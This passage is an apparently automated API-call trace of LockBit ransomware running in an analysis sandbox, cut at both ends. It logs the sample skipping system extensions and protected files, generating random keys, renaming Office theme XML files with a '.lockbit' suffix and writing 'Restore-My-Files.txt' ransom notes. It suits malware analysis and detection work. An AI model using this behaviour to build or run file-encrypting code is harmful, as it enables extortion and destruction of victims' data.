Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0191.577] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0191.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0191.579] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0191.579] malloc (_Size=0x40068) returned 0x1ff1e60 [0191.579] WriteFile (in: hFile=0x330, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0191.581] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfd8000, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdfd8000, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Angles.xml", cAlternateFileName="")) returned 1 [0191.581] lstrcmpiW (lpString1=".", lpString2="Angles.xml") returned -1 [0191.581] lstrcmpiW (lpString1="..", lpString2="Angles.xml") returned -1 [0191.581] PathFindExtensionW (pszPath="Angles.xml") returned=".xml" [0191.581] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0191.581] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0191.581] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0191.582] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0191.583] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="ntldr", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="autorun.inf", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="thumbs.db", lpString2="Angles.xml") returned 1 [0191.584] lstrcmpiW (lpString1="iconcache.db", lpString2="Angles.xml") returned 1 [0191.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0191.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml") returned=".xml" [0191.584] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0191.584] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0191.584] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0191.585] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0191.585] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.lockbit") returned 85 [0191.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0191.586] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0191.586] malloc (_Size=0x40068) returned 0x3d70450 [0191.587] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=925) returned 1 [0191.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0191.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0191.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0191.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0191.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0191.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0191.588] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0192.019] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.019] malloc (_Size=0xc0) returned 0x1fa2ed8 [0192.019] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0192.019] free (_Block=0x1fa2ed8) [0192.019] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.019] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.020] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb6b6700, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb6b6700, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apex.xml", cAlternateFileName="")) returned 1 [0192.020] lstrcmpiW (lpString1=".", lpString2="Apex.xml") returned -1 [0192.020] lstrcmpiW (lpString1="..", lpString2="Apex.xml") returned -1 [0192.020] PathFindExtensionW (pszPath="Apex.xml") returned=".xml" [0192.020] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.020] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.021] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="ntldr", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="autorun.inf", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="thumbs.db", lpString2="Apex.xml") returned 1 [0192.022] lstrcmpiW (lpString1="iconcache.db", lpString2="Apex.xml") returned 1 [0192.022] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.022] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml") returned=".xml" [0192.022] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.022] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.022] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.023] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.023] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.lockbit") returned 83 [0192.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.026] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.026] malloc (_Size=0x40068) returned 0x3df0008 [0192.026] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=959) returned 1 [0192.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.027] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.036] malloc (_Size=0xbc) returned 0x1fa2ed8 [0192.036] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0192.038] free (_Block=0x1fa2ed8) [0192.038] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.038] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.038] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09100, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe09100, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apothecary.xml", cAlternateFileName="APOTHE~1.XML")) returned 1 [0192.039] lstrcmpiW (lpString1=".", lpString2="Apothecary.xml") returned -1 [0192.039] lstrcmpiW (lpString1="..", lpString2="Apothecary.xml") returned -1 [0192.039] PathFindExtensionW (pszPath="Apothecary.xml") returned=".xml" [0192.039] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.039] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.040] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="ntldr", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="autorun.inf", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="thumbs.db", lpString2="Apothecary.xml") returned 1 [0192.041] lstrcmpiW (lpString1="iconcache.db", lpString2="Apothecary.xml") returned 1 [0192.041] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.041] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml") returned=".xml" [0192.041] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.041] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".dbf", lpString2=".xml") 